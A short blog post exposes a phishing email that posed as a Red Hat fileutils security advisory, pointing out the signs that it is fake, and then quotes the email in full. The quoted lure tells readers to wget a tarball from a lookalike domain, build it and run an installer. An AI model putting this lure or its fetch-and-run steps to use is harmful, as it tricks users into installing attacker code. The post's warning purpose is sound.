RedHat Scammers

I know this is old news, but I did get this phishy email regarding the fileutils ‘vulnerability’ on RedHat. Since this has come out there’s been all sorts of doom-n-gloom articles with titles such as “Red Hat email scam: Hard target or harbinger for Linux?” but, as you can see below, this email looks nothing like any of the official errata reports from RH. It also asks users to download a tar.gz file instead of simply connecting to RHN, and the email isn’t signed with the RH gpg key. If you fell for this, you don’t need to be an admin… Sorry.

Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat

A complete revision history is at the end of this file.

Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

  • First download the patch from the Security RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
  • Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
  • cd fileutils-1.0.6.patch
  • make
  • ./inst

Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.

Thank you for your prompt attention to this serious matter,

RedHat Security Team.

Copyright © 2004 Red Hat, Inc. All rights reserved.

Leave a Reply